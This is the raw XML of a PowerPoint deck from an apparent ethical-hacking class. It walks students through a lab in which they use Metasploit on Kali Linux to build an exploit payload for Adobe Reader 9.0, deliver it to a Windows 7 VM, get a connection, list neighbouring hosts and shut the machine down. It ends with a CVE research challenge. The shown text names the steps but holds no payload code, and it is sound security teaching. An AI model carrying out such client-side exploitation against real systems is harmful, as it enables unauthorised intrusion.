            </a:r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endParaRPr lang="en-SG" sz="2000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F5362-651D-4E5A-B75A-1D34386EF3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2667000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This can be a different user…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22860E-4329-45E0-85A8-6102161AE278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6096000" y="2362200"/>
            <a:ext cx="228600" cy="304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4EF95A1-18FE-48EC-8F13-26BA9844E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79" y="1562100"/>
            <a:ext cx="5297021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790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14362" y="838200"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
              <a:t>Step 4 – find out the neibouring machines using “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
              <a:t>” command..</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000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F5362-651D-4E5A-B75A-1D34386EF3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7843838" y="2541125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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>e output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>will be different if you on different network..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22860E-4329-45E0-85A8-6102161AE278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6855589" y="2956623"/>
            <a:ext cx="860867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FC8B2E6-7315-4604-BF8F-A65950F49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9" y="1640466"/>
            <a:ext cx="5010150" cy="357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192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838200"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896620" indent="-896620">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 5 – Shut down the remote machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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620" indent="-896620">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 6– Exit Metasploit and suspend the Kali Linux OS. </a:t>
            </a:r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pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" kern="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2000" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5791200"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 6 ---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02B7C-3072-44B6-8E68-BDF019B56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99" y="1430438"/>
            <a:ext cx="7477607" cy="1093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1CDF6A-BAF5-47EE-AAD0-E59834688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399" y="3729653"/>
            <a:ext cx="7607167" cy="169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31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n w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Task 1 – Set up your Windows 7 VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Task 2 – Start Kali Linux 2017.1 and Install Acrobat Reader </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Task 3 - Creating an Exploit Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Task 4 – Deliver the Exploit to the Victim’s Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Task 5 – Start the Server to Listen for Connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Task 6 – Penetrate into Windows 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG"/>
              <a:t>Challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b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2087488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09800" y="2362200"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-SG" sz="4000"/>
              <a:t>Challenge 2.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1782402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Challenge 2.1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30435-7B91-42B7-A9A6-DC81B85A0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SG"/>
          </a:p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887B34-6BA9-4603-84D3-FD4A5A1F6E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="614361" y="838200"/>
            <a:ext cx="10871199" cy="5181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40000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr kumimoji="1" sz="3200" b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120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr kumimoji="1" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt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hlink"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt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uFillTx/>
                <a:latin typeface="+mn-lt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anose="05000000000000000000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5pPr>
            <a:lvl6pPr marL="2514537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6pPr>
            <a:lvl7pPr marL="297172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7pPr>
            <a:lvl8pPr marL="342891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8pPr>
            <a:lvl9pPr marL="388610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90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
              <a:t>There are many applications exhibit vulnerabilities that allow code execution similar to this practical. Some of them are as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t> Firefox Version 37.0 (released on 31/3/2015)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t>Java Run Time v7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t>VLC Media Player 1.1.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0"/>
              <a:t>Research for any THREE applications (reported in last three years) that possess such vulnerability that enabled client side attack. Provide the following information in a MS Document in your class team Week2 channel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t>Name and version of Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t>Summary of the Vulnerability (Two Sentences)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t>CVE or MS Bulletin Number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0"/>
              <a:t>URL Link/YouTube Link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>Name your file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>as Cha2.1-your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>full name(Avoid using name not on your student card).</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="1200" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="18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pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41199402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286000" y="2133601"/>
            <a:ext cx="7772400" cy="1225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116229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Important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Do this exercise on your own notebook.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make a copy of the Windows 7 VM from the Week 2 folder in “Class Materials” under the “General” channel in 0421-EH-ALL in Team or from the desktop machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>Connect your machine to the lab. Wireless network. If the practical did not work, connect to your phone hotspot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Open the Windows 7 VM and you can login in as User1 with no password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The network setting set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. Check the IP and note it down after you login the OS.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/>
              <a:t>Open Kali Linux in another player.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The network setting set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. Check the IP and note it down after you login the OS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If any one of the VMs appeared to be slow, you need to increase the memory and number of processor of the respective VM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111174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0" y="2438400"/>
            <a:ext cx="821260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 1 – Setup your Windows Environment for Pen-Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219169370"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Contport">
  <a:themeElements>
    <a:clrScheme name="Contpor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port">
      <a:majorFont>
        <a:latin typeface="Tahoma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ontpor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por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por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por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FC263C1BB8CE419EB5D4898E29476C" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="615e6d275176d44f918c8c0632d8f860">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="b3cb7993-a6de-4faf-ad31-2d728e621b0d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="51aeffd96d6e409178f3a28261d73039" ns2:_="">
    <xsd:import namespace="b3cb7993-a6de-4faf-ad31-2d728e621b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cb7993-a6de-4faf-ad31-2d728e621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BDE64B-D012-4740-8235-1D7B141DFF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cb7993-a6de-4faf-ad31-2d728e621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CB51F8-DEA3-493A-9333-451AE92F7C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9DC9E7-9550-40D6-803F-827E1A84D162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a62f1998-33d4-4a4d-a95f-c939e5057d18"/>
    <ds:schemaRef ds:uri="d35e038f-c4a7-46a9-99d4-a3799d0eb7a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1437</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1018</Paragraphs>
  <Slides>72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Contport</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Learning Objectives</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Contents</vt:lpstr>
      <vt:lpstr>Important Instructions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Task 1 – Setup your Windows Environment for Pen-Test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2 – Start Kali Linux and Install Adobe Reader 9.0</vt:lpstr>
      <vt:lpstr>Note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3 – Create an Exploit Payload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4 – Give the exploit to the End-User of Windows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5 – Start the Server to Listen for Connection &amp; Exploit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 2.1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 Hock Guan</dc:creator>
  <cp:lastModifiedBy>Hock Guan TAN (NP)</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-27T18:10:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-27T22:29:39Z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0x0101004EFC263C1BB8CE419EB5D4898E29476C</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_SiteId">
    <vt:lpwstr>cba9e115-3016-4462-a1ab-a565cba0cdf1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_ActionId">
    <vt:lpwstr>6bdd5ebb-30ba-4b5a-8186-b96a64e0c190</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_SetDate">
    <vt:lpwstr>2021-04-27T22:26:48Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Name">
    <vt:lpwstr>dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_ContentBits">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="ClassificationContentMarkingHeaderLocations">
    <vt:lpwstr>Contport:3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="ClassificationContentMarkingHeaderText">
    <vt:lpwstr>                    Official Open</vt:lpwstr>
  </property>
</Properties>
</file>